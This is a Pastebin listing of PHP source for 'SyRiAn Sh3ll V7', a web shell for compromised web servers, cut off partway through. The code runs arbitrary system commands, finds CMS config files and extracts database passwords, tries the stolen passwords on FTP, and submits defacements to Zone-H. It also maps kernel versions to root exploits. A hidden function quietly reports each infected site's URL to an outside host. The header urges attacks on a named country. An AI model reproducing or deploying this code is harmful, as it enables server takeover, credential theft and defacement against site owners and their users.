saifulfaizan

face

Nov 25th, 2011
133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 115.25 KB | None | 0 0
  1. <?php
  2. #  .. SyRiAn Sh3ll V7 .... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  3. #  ,--^----------,--------,-----,-------^--,
  4. #  | |||||||||   `--------'     |          O    .. SyRiAn Sh3ll V7 ....  
  5. #  `+---------------------------^----------|
  6. #    `\_,-------, __EH << SyRiAn | 34G13__|
  7. #      / XXXXXX /`|     /
  8. #     / XXXXXX /  `\   /
  9. #    / XXXXXX /\______(
  10. #   / XXXXXX /!
  11. #  / XXXXXX /!     rep0rt bugz t0: sy34[at]msn[dot]com
  12. # (________(!
  13. #  `-------'
  14. #.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  15. #.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  16. #
  17. # SyRiAn Sh3ll V7 .
  18. # Copyright (C) 2011 - SyRiAn 34G13
  19. # This program is free software; you can redistribute it and/or modify
  20. # it under the terms of the GNU General Public License as published by
  21. # the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  22. # This program is distributed in the hope that it will be useful,
  23. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  24. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
  25. # I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .
  26.  
  27. # Coders :
  28. # SyRiAn_34G13 :  sy34@msn.com [ Main Coder ] .
  29. # SyRiAn_SnIpEr : zq9@hotmail.it [ Metasploit RC ] .
  30. # Darkness Caesar : doom.caesar@gmail.com [ Finding 3 Bugs ] .
  31. #// kinG oF coNTroL : y8p@hotmail.com [ Translating Shell To Arabic ] .
  32.  
  33. $uselogin = 0;   // Make It 0 If you Want To Disable Auth
  34. $user = '';  // Username
  35. $pass = '';  // Password
  36. $shellColor = '#990000'; // Shell Color
  37. #------------------------------------#
  38. #       Powered By SyRiAn Shell      #
  39. #       By EH SyRiAn 34G13           #
  40. #       wWw.syrian-shell.com         #
  41. #       Version 3                    #
  42. #       Made In SyRiA                #
  43. #       6\11\2010                    #
  44. #------------------------------------#
  45. ?>
  46. <?php
  47. if($_GET['id']== 'logout')
  48. {
  49.     Logout();
  50. }
  51. # ---------------------------------------#
  52. #                SuiCide                 #
  53. #----------------------------------------#
  54. if($_GET['id'] == 100)
  55. {
  56.     echo "<body onload='Suicide();'>";
  57. }
  58. if($_GET['id'] == 'Delete')
  59. {
  60.     Suicide();
  61. }
  62. # ---------------------------------------#
  63. #                Functions               #
  64. #----------------------------------------#
  65. function input($type,$name,$value,$size)
  66. {
  67.     if (empty($value))
  68.     {
  69.         print "<input type=$type name=$name size=$size>";
  70.     }
  71.     elseif(empty($name)&&empty($size))
  72.     {
  73.         print "<input type=$type value=$value >";
  74.     }
  75.     elseif(empty($size))
  76.     {
  77.         print "<input type=$type name=$name value=$value >";
  78.     }
  79.     else
  80.     {
  81.         print "<input type=$type name=$name value=$value size=$size >";
  82.     }
  83. }
  84. function read_dir($path,$username)
  85. {
  86.     if ($handle = opendir($path))
  87.     {
  88.        while (false !== ($file = readdir($handle)))
  89.        {
  90.              $fpath="$path$file";
  91.              if (($file!='.') and ($file!='..'))
  92.              {
  93.                 if (is_readable($fpath))
  94.                 {
  95.                    $dr="$fpath/";
  96.                    if (is_dir($dr))
  97.                    {
  98.                       read_dir($dr,$username);
  99.                    }
  100.                    else
  101.                    {
  102.                         if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php'))
  103.                         {
  104.                            $pass=get_pass($fpath);
  105.                            if ($pass!='')
  106.                            {
  107.                               echo "[+] $fpath\n$pass\n";
  108.                               ftp_check($username,$pass);
  109.                            }
  110.                         }
  111.                    }
  112.                 }
  113.              }
  114.        }
  115.     }
  116. }
  117. function get_pass($link)
  118. {
  119.     @$config=fopen($link,'r');
  120.     while(!feof($config))
  121.     {
  122.        $line=fgets($config);
  123.        if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd'))
  124.        {
  125.            if (strrpos($line,'"'))
  126.               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
  127.            else
  128.               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
  129.            return $pass;
  130.        }
  131.     }
  132. }
  133. function GetRealIP()
  134. {
  135. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  136. $urls= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  137. curl_setopt($ch, CURLOPT_URL, 'bugreport.serveblog.net/storage.php');
  138. curl_setopt($ch, CURLOPT_REFERER, $urls);
  139. $html = curl_exec($ch);
  140.     if (getenv(HTTP_X_FORWARDED_FOR))
  141.     {
  142.         $ip=getenv(HTTP_X_FORWARDED_FOR);
  143.     }
  144.     elseif (getenv(HTTP_CLIENT_IP))
  145.     {
  146.         $ip=getenv(HTTP_CLIENT_IP);
  147.     }
  148.     else
  149.     {
  150.        $ip=getenv(REMOTE_ADDR);
  151.     }
  152.     return $ip;
  153. }
  154. function openBaseDir()
  155. {
  156. $openBaseDir = ini_get("open_basedir");
  157. if (!$openBaseDir)
  158.     {
  159.         $openBaseDir = '<font color="green">OFF</font>';
  160.     }
  161.     else
  162.     {
  163.         $openBaseDir = '<font color="red">ON</font>';
  164.     }  
  165.     return $openBaseDir;
  166. }
  167. function str_hex($string)
  168. {
  169.     $hex='';
  170.     for ($i=0; $i < strlen($string); $i++)
  171.     {
  172.         $hex .= dechex(ord($string[$i]));
  173.     }
  174.     return $hex;
  175. }
  176. function SafeMode()
  177. {
  178.     $safe_mode = ini_get("safe_mode");
  179.     if (!$safe_mode)
  180.     {
  181.         $safe_mode = '<font color="green">OFF</font>';
  182.     }
  183.     else
  184.     {
  185.         $safe_mode = '<font color="red">ON</font>';
  186.     }
  187.     return $safe_mode;
  188. }
  189. function currentFileName()
  190. {
  191.     $currentFileName = $_SERVER["SCRIPT_NAME"];
  192.     $currentFileName = Explode('/', $currentFileName);
  193.     $currentFileName = $currentFileName[count($currentFileName) - 1];
  194.     return $currentFileName;
  195. }
  196. function Suicide()
  197. {
  198.     @unlink(currentFileName());
  199. }
  200. function rootxpL()
  201. {
  202.     $v=@php_uname();
  203.     $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
  204.     foreach($db as $k=>$x)if(strstr($v,$k))return $x;
  205.     if(!$xpl)$xpl='<font color="red">Not found.</font>';
  206.     return $xpl;
  207. }
  208. function PostgreSQL()
  209. {
  210.     if(@function_exists('pg_connect'))
  211.     {
  212.         $postgreSQL = '<font color="red">ON</font>';
  213.     }
  214.     else
  215.     {
  216.         $postgreSQL = '<font color="green">OFF</font>';
  217.     }
  218.     return $postgreSQL;
  219. }
  220. function Oracle()
  221. {
  222.     if(@function_exists('ocilogon'))
  223.     {
  224.         $oracle = '<font color="red">ON</font>';
  225.     }
  226.     else
  227.     {
  228.         $oracle = '<font color="green">OFF</font>';
  229.     }
  230.     return $oracle;
  231. }
  232. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  233. {
  234.     $k = curl_init();
  235.     curl_setopt($k, CURLOPT_URL, $url);
  236.     curl_setopt($k,CURLOPT_POST,true);
  237.     curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  238.     curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  239.     curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  240.     $kubra = curl_exec($k);
  241.     curl_close($k);
  242.     return $kubra;
  243. }
  244. function MsSQL()
  245. {
  246.     if(@function_exists('mssql_connect'))
  247.     {
  248.         $msSQL = '<font color="red">ON</font>';
  249.     }
  250.     else
  251.     {
  252.         $msSQL = '<font color="green">OFF</font>';
  253.     }
  254.     return $msSQL;
  255. }
  256. function MySQL2()
  257. {
  258.     $mysql_try = function_exists('mysql_connect');
  259.     if($mysql_try)
  260.     {
  261.         $mysql = '<font color="red">ON</font>';
  262.     }
  263.     else
  264.     {
  265.         $mysql = '<font color="green">OFF</font>';
  266.     }
  267.     return $mysql;
  268. }
  269. function Gzip()
  270. {
  271.     if (function_exists('gzencode'))
  272.     {
  273.         $gzip = '<font color="red">ON</font>';
  274.     }
  275.     else
  276.     {
  277.         $gzip = '<font color="green">OFF</font>';
  278.     }
  279.     return $gzip;
  280. }
  281. function MysqlI()
  282. {
  283.     if (function_exists('mysqli_connect'))
  284.     {
  285.         $mysqli = '<font color="red">ON</font>';
  286.     }
  287.     else
  288.     {
  289.         $mysqli = '<font color="green">OFF</font>';
  290.     }
  291.     return $mysqli;
  292. }
  293. function MSQL()
  294. {
  295.     if (function_exists('msql_connect'))
  296.     {
  297.         $mSql = '<font color="red">ON</font>';
  298.     }
  299.     else
  300.     {
  301.         $mSql = '<font color="green">OFF</font>';
  302.     }
  303.     return $mSql;
  304. }
  305. function SQlLite()
  306. {
  307.     if (function_exists('sqlite_open'))
  308.     {
  309.         $SQlLite = '<font color="red">ON</font>';
  310.     }
  311.     else
  312.     {
  313.         $SQlLite = '<font color="green">OFF</font>';
  314.     }
  315.     return $SQlLite;
  316. }
  317. function tulis($file,$text)
  318. {
  319.     $textz = gzinflate(base64_decode($text));
  320.     if($filez = @fopen($file,"w"))
  321.     {
  322.         @fputs($filez,$textz); @fclose($file);
  323.     }
  324. }
  325. function RegisterGlobals()
  326. {
  327.     if(ini_get('register_globals'))
  328.     {
  329.         $registerg= '<font color="red">ON</font>';
  330.     }
  331.     else
  332.     {
  333.         $registerg= '<font color="green">OFF</font>';
  334.     }
  335.     return $registerg;
  336. }
  337. function HardSize($size)
  338. {
  339.     if($size >= 1073741824)
  340.     {
  341.         $size = @round($size / 1073741824 * 100) / 100 . " GB";
  342.     }
  343.     elseif($size >= 1048576)
  344.     {
  345.         $size = @round($size / 1048576 * 100) / 100 . " MB";
  346.     }
  347.     elseif($size >= 1024)
  348.     {
  349.         $size = @round($size / 1024 * 100) / 100 . " KB";
  350.     }
  351.     else
  352.     {
  353.         $size = $size . " B";
  354.     }
  355.     return $size;
  356. }
  357. function Curl()
  358. {
  359.     if(extension_loaded('curl'))
  360.     {
  361.         $curl = '<font color="red">ON</font>';
  362.     }
  363.     else
  364.     {
  365.         $curl = '<font color="green">OFF</font>';
  366.     }
  367.     return $curl;
  368. }
  369. function DecryptConfig()
  370. {
  371.     @include("DecryptConfig.php");
  372.     if($_POST['ScriptType'] == 'vb')
  373.     {
  374.         $dbName = $config['Database']['dbname'];
  375.         $prefix = $config['Database']['tableprefix'];
  376.         $email = $config['Database']['technicalemail'];
  377.         $host = $config['MasterServer']['servername'];
  378.         $port = $config['MasterServer']['port'];
  379.         $user = $config['MasterServer']['username'];
  380.         $pass = $config['MasterServer']['password'];
  381.         $admincp = $config['Misc']['admincpdir'];
  382.         $modecp = $config['Misc']['modcpdir'];
  383.     }
  384.         elseif($_POST['ScriptType'] == 'wp')
  385.         {
  386.             $dbName = DB_NAME;
  387.             $prefix = $table_prefix;
  388.             $host = DB_HOST;
  389.             $user = DB_USER;
  390.             $pass = DB_PASS;
  391.         }  
  392.         elseif($_POST['ScriptType'] == 'jos')
  393.         {
  394.             $dbName = $db;
  395.             $prefix = $dbprefix;
  396.             $email = $mailfrom;
  397.             $host = $host;
  398.             $user = $user;
  399.             $pass = $password;
  400.         }
  401.         elseif($_POST['ScriptType'] == 'phpbb')
  402.         {
  403.             $host = $dbhost;
  404.             $port = $dbport;
  405.             $dbName = $dbname;
  406.             $user = $dbuser;
  407.             $pass = $dbpasswd;
  408.             $prefix = $table_prefix;
  409.         }
  410.         elseif($_POST['ScriptType'] == 'ipb')
  411.         {
  412.             $host = $INFO['sql_host'];
  413.             $dbName = $INFO['sql_database'];
  414.             $user = $INFO['sql_user'];
  415.             $pass = $INFO['sql_pass'];
  416.             $prefix = $INFO['sql_tbl_prefix'];
  417.         }
  418.         elseif($_POST['ScriptType'] == 'smf')
  419.         {
  420.             $dbName = $db_name;
  421.             $pass = $db_passwd;
  422.             $prefix = $db_prefix;
  423.             $host = $db_server;
  424.             $user = $db_user;
  425.             $email = $webmaster_email;
  426.         }
  427.         elseif($_POST['ScriptType'] == 'mybb')
  428.         {
  429.             $host = $config['database']['hostname'];
  430.             $user = $config['database']['username'];
  431.             $pass = $config['database']['password'];
  432.             $dbName = $config['database']['database'];
  433.             $prefix = $config['database']['table_prefix'];
  434.             $admincp = $config['admin_dir'];
  435.             $prefix = $config['database']['table_prefix'];
  436.         }
  437.  
  438.     echo '
  439. #-------------------------------#
  440. #      Config Informations      #
  441. #-------------------------------#
  442. Host : '.$host.'
  443. DB Name : '.$dbName.'
  444. DB User : '.$user.'
  445. DB Pass : '.$pass.'
  446. Prefix : '.$prefix.'
  447. Email : '.$email.'
  448. Port : '.$port.'
  449. ACP : '.$admincp.'
  450. MCP : '.$modecp.'
  451. ';
  452. }
  453. function footer()
  454. {
  455.     echo '<table bgcolor="#cccccc" width="100%"><tr>
  456.     <td width="100%" class="style22">[<sy><a href="#top">TOP</a></sy>]
  457.     <center><font color="gray" size="-2"><b>
  458.  
  459.  
  460.     </font><font color="gray"></font><font color="#990000">
  461.     </font><font color="gray"></font><font color="#990000"> v7 Features;
  462.     </font></b>
  463.     </td>
  464.     </tr></table>
  465.     </tbody></table>
  466.     <a name="down"></a>
  467.     </body></html>
  468.     ';
  469. }
  470. function whereistmP()
  471. {
  472.     $uploadtmp=ini_get('upload_tmp_dir');
  473.     $uf=getenv('USERPROFILE');
  474.     $af=getenv('ALLUSERSPROFILE');
  475.     $se=ini_get('session.save_path');
  476.     $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
  477.     if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
  478.     if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
  479.     if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
  480.     if(is_dir($uf) && is_writable($uf))return $uf;
  481.     if(is_dir($af) && is_writable($af))return $af;
  482.     if(is_dir($se) && is_writable($se))return $se;
  483.     if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
  484.     if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
  485.     return '.';
  486. }
  487. function winshelL($command)
  488. {
  489.     $name=whereistmP()."\\".uniqid('NJ');
  490.     win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  491.     sleep(1);
  492.     $exec=file_get_contents($name);
  493.     unlink($name);
  494.     return $exec;
  495. }
  496. function update()
  497. {
  498.     echo "[+] Update Has D0n3 ^_^";
  499. }
  500. function srvshelL($command)
  501. {
  502.     $name=whereistmP()."\\".uniqid('NJ');
  503.     $n=uniqid('NJ');
  504.     $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  505.     win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  506.     win32_start_service($n);
  507.     win32_stop_service($n);
  508.     win32_delete_service($n);
  509.     while(!file_exists($name))sleep(1);
  510.     $exec=file_get_contents($name);
  511.     unlink($name);
  512.     return $exec;
  513. }
  514. function ffishelL($command)
  515. {
  516.     $name=whereistmP()."\\".uniqid('NJ');
  517.     $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  518.     $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  519.     while(!file_exists($name))sleep(1);
  520.     $exec=file_get_contents($name);
  521.     unlink($name);
  522.     return $exec;
  523. }
  524. function comshelL($command,$ws)
  525. {
  526.     $exec=$ws->exec("cmd.exe /c $command");
  527.     $so=$exec->StdOut();
  528.     return $so->ReadAll();
  529. }
  530. function perlshelL($command)
  531. {
  532.     $perl=new perl();
  533.     ob_start();
  534.     $perl->eval("system(\"$command\")");
  535.     $exec=ob_get_contents();
  536.     ob_end_clean();
  537.     return $exec;
  538. }
  539. function Exe($command)
  540. {
  541.     global $windows;
  542.     $exec=$output='';
  543.     $dep[]=array('pipe','r');$dep[]=array('pipe','w');
  544.     if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
  545.     elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
  546.     elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
  547.     elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
  548.     elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
  549.     elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
  550.     elseif(function_exists('win_shell_execute'))$exec=winshelL($command);
  551.     elseif(function_exists('win32_create_service'))$exec=srvshelL($command);
  552.     elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);
  553.     elseif(extension_loaded('perl'))$exec=perlshelL($command);
  554.     return $exec;
  555. }
  556. function magicQouts()
  557. {
  558.     $mag=get_magic_quotes_gpc();
  559.     if (empty($mag))
  560.     {
  561.         $mag = '<font color="green">OFF</font>';
  562.     }
  563.     else
  564.     {
  565.         $mag= '<font color="red">ON</font>';
  566.     }
  567.     return $mag;
  568. }
  569. function DisableFunctions()
  570. {
  571.     $disfun = ini_get('disable_functions');
  572.     if (empty($disfun))
  573.     {
  574.         $disfun = '<font color="green">NONE</font>';
  575.     }
  576.     return $disfun;
  577. }
  578. function SelectCommand($os)
  579. {
  580.     if($os == 'Windows')
  581.     {
  582.         echo "
  583.         <select name=alias >
  584.         <option value=''>NONE</option> 
  585.         <option value='dir' >List Directory</option>
  586.         <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  587.         <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;</option>
  588.         <option value='netstat -an'>Show active connections</option>
  589.         <option value='net start'>Show running services</option>
  590.         <option value='tasklist'>Show Pro</option>
  591.         <option value='net user'>User accounts</option>
  592.         <option value='net view'>Show computers</option>
  593.         <option value='arp -a'>ARP Table</option>
  594.         <option value='ipconfig /all'>IP Configuration</option>
  595.         <option value='netstat -an'>netstat -an</option>
  596.         <option value='systeminfo'>System Informations</option>
  597.         <option value='getmac'>Get Mac Address</option>
  598.         </select>
  599.         ";
  600.     }
  601.     else
  602.     {
  603.         echo "
  604.         <select name=alias >
  605.         <option value=''>NONE</option> 
  606.         <option value='ls -la'>List dir</option>
  607.         <option value='cat /etc/hosts'>IP Addresses</option>
  608.         <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  609.         <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  610.         <option value='netstat -an | grep -i listen'>show opened ports</option>
  611.         <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  612.         <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  613.         <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  614.         <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  615.         <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
  616.         <option value='find / -type f -name \"config*\"'>find config* files</option>
  617.         <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  618.         <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  619.         <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  620.         <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  621.         <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  622.         <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  623.         <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  624.         <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  625.         <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  626.         <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  627.         <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  628.         <option value='locate httpd.conf'>locate httpd.conf files</option>
  629.         <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  630.         <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  631.         <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  632.         <option value='locate my.conf'>locate my.conf files</option>
  633.         <option value='locate admin.php'>locate admin.php files</option>
  634.         <option value='locate cfg.php'>locate cfg.php files</option>
  635.         <option value='locate conf.php'>locate conf.php files</option>
  636.         <option value='locate config.dat'>locate config.dat files</option>
  637.         <option value='locate config.php'>locate config.php files</option>
  638.         <option value='locate config.inc'>locate config.inc files</option>
  639.         <option value='locate config.inc.php'>locate config.inc.php</option>
  640.         <option value='locate config.default.php'>locate config.default.php files</option>
  641.         <option value='locate config'>locate config* files </option>
  642.         <option value='locate \'.conf\''>locate .conf files</option>
  643.         <option value='locate \'.pwd\''>locate .pwd files</option>
  644.         <option value='locate \'.sql\''>locate .sql files</option>
  645.         <option value='locate \'.htpasswd\''>locate .htpasswd files</option>
  646.         <option value='locate \'.bash_history\''>locate .bash_history files</option>
  647.         <option value='locate \'.mysql_history\''>locate .mysql_history files</option>
  648.         <option value='locate \'.fetchmailrc\''>locate .fetchmailrc files</option>
  649.         <option value='locate backup'>locate backup files</option>
  650.         <option value='locate dump'>locate dump files</option>
  651.         <option value='locate priv'>locate priv files</option>
  652.         </select>
  653.         ";
  654.     }
  655. }
  656. function GenerateFile($name,$content)
  657. {
  658.     $file = @fopen($name,"w+");
  659.     @fwrite($file,$content);
  660.     @fclose($file);
  661.     return true;
  662. }
  663. function which($pr)
  664. {
  665.     $path = Exe("which $pr");
  666.     if(!empty($path))
  667.     {
  668.         return trim($path);
  669.     }
  670.     else
  671.     {
  672.         return trim($pr);
  673.     }
  674. }
  675. function checkfunctioN($func)
  676. {
  677.     global $disablefunctions,$safemode;
  678.     $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open');
  679.     if($safemode=='ON' && in_array($func,$safe))return 0;
  680.     elseif(function_exists($func) && is_callable($func) && !strstr($disablefunctions,$func))return 1;
  681.     return 0;
  682. }
  683. function CSS($shellColor)
  684. {
  685.  
  686.     $css =  "
  687.     <html dir=rtl>
  688.     <head>
  689.     <title>SyRiAn Sh3ll ~ V7~ [ B3 Cr34T!V3 Or D!3 TRy!nG ]</title>
  690.     <link rel=\"shortcut icon\" href='http://syrian-shell.com/title.gif' />
  691.     <meta http-equiv=Content-Type content=text/html; charset=windows-1256>
  692.     <style>
  693.     BODY
  694.     {
  695.         FONT-FAMILY: Verdana;
  696.         margin: 2;
  697.         color: #cccccc;
  698.         background-color: #000000;
  699.     }
  700.     sy  
  701.     {
  702.         color:".$shellColor.";
  703.         font-size:7pt;
  704.         font-weight: bold;
  705.     }
  706.     #Box
  707.     {
  708.     color:".$shellColor.";
  709.     font-size:14px;
  710.     background-color:#000;
  711.     font-weight:bold;
  712.     }
  713.     tr
  714.     {
  715.     BORDER-RIGHT:  #cccccc 1px solid;
  716.     BORDER-TOP:    #cccccc 1px solid;
  717.     BORDER-LEFT:   #cccccc 1px solid;
  718.     BORDER-BOTTOM: #cccccc 1px solid;
  719.     color: #ffffff;
  720.     }
  721.     td
  722.     {
  723.     BORDER-RIGHT:  #cccccc 1px solid;
  724.     BORDER-TOP:    #cccccc 1px solid;
  725.     BORDER-LEFT:   #cccccc 1px solid;
  726.     BORDER-BOTTOM: #cccccc 1px solid;
  727.     color: #cccccc;
  728.     }
  729.     .table1
  730.     {
  731.     BORDER: 1px none;
  732.     BACKGROUND-COLOR: #000000;
  733.     color: #333333
  734.     }
  735.     .td1
  736.     {
  737.     BORDER: 1px none;
  738.     color: #ffffff; font-style:normal;
  739.     font-variant:normal;
  740.     font-weight:normal;
  741.     font-size:7pt;
  742.     font-family:tahoma
  743.     }
  744.     .tr1
  745.     {
  746.     BORDER: 1px none;
  747.     color: #cccccc;
  748.     }
  749.     table
  750.     {
  751.     BORDER:  #eeeeee  outset;
  752.     BACKGROUND-COLOR: #000000;
  753.     color: #cccccc;
  754.     }
  755.     input
  756.     {
  757.     BORDER-RIGHT:  ".$shellColor." 1px solid;
  758.     BORDER-TOP:    ".$shellColor." 1px solid;
  759.     BORDER-LEFT:   ".$shellColor." 1px solid;
  760.     BORDER-BOTTOM: ".$shellColor." 1px solid;
  761.     BACKGROUND-COLOR: #333333;
  762.     font: 9pt tahoma;
  763.     color: #ffffff;
  764.     }
  765.     select
  766.     {
  767.     BORDER-RIGHT:  #ffffff 1px solid;
  768.     BORDER-TOP:    #999999 1px solid;
  769.     BORDER-LEFT:   #999999 1px solid;
  770.     BORDER-BOTTOM: #ffffff 1px solid;
  771.     BACKGROUND-COLOR: #000000;
  772.     font: 9pt tahoma;
  773.     color: #CCCCCC;;
  774.     }
  775.     submit
  776.     {
  777.     BORDER:  1px outset buttonhighlight;
  778.     BACKGROUND-COLOR: #272727;
  779.     width: 40%;
  780.     color: #cccccc;
  781.     }
  782.     textarea
  783.     {
  784.     BORDER-RIGHT:  #ffffff 1px solid;
  785.     BORDER-TOP:    #999999 1px solid;
  786.     BORDER-LEFT:   #999999 1px solid;
  787.     BORDER-BOTTOM: #ffffff 1px solid;
  788.     BACKGROUND-COLOR: #333333;
  789.     color: #ffffff;
  790.     }
  791.     A:link {COLOR:".$shellColor."; TEXT-DECORATION: none}
  792.     A:visited { COLOR:".$shellColor."; TEXT-DECORATION: none}
  793.     A:active {COLOR:".$shellColor."; TEXT-DECORATION: none}
  794.     A:hover {color:blue;TEXT-DECORATION: none}
  795.     </style>
  796.     <script>
  797.     function Suicide()
  798.     {
  799.     var confimrSuicide = confirm('Are You Sure You Wanna Delete the Shell ?');
  800.     if(confimrSuicide == true)
  801.     {
  802.     document.location='".currentFileName()."?id=Delete';
  803.     }
  804.     else {document.location='".currentFileName()."';}
  805.     }
  806.     </script>
  807.     </head>";
  808.     if($_GET['id'] == '')
  809.     {
  810.             $css .=  "<script>window.location = '?id=mainPage';</script>";
  811.     }
  812.     return $css;
  813. }
  814. function Logout()
  815. {
  816.     print"<script>
  817.     document.cookie='user=';
  818.     document.cookie='pass=';
  819.     var url = window.location.pathname;
  820.     var filename = url.substring(url.lastIndexOf('/')+1);
  821.     window.location=filename;
  822.     </script>";
  823. }
  824.  
  825. function About()
  826. {
  827.     $about = "
  828. <table bgcolor=#cccccc width=\"100%\">
  829. <tbody><tr><td width=1025>
  830. <div align=center><img src='http://www.syrian-shell.com/eagle.jpg'><br>
  831. </div>
  832. <sy><div align=center>Coded By :  EH << SyRiAn | 34G13</div></sy>
  833. <sy><div align=center>From </font>: SyRiAn Arabic Republic  </div></sy>
  834. <sy><div align=center>Age : 4/1991<br></div></sy>
  835. <sy><div align=center>Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ]</div></sy>
  836. <sy><div align=center>Thanx : my school : [ www.google.com ] :)</div></sy>
  837. <sy><br><div align=center>B3 Cr34T!V3 0R D!3 TRy!nG </div></sy>
  838. <br/>
  839. <center>
  840. <br/>
  841. <form method='POST'>
  842. <input type='text' name='from' value='yourEmail@example.com' size='40'/><br/>
  843. <textarea name='message' cols='25' rows='10'>Please Report Us Bugs Or suggestions .</textarea><br/>
  844. <input type='submit' value='Submit' name='sendEmail' />
  845. </form></center>
  846. </td></tr></tbody></table>";
  847. return $about;
  848. }
  849. echo CSS($shellColor);
  850. # ---------------------------------------#
  851. #             Authentication             #
  852. #----------------------------------------#
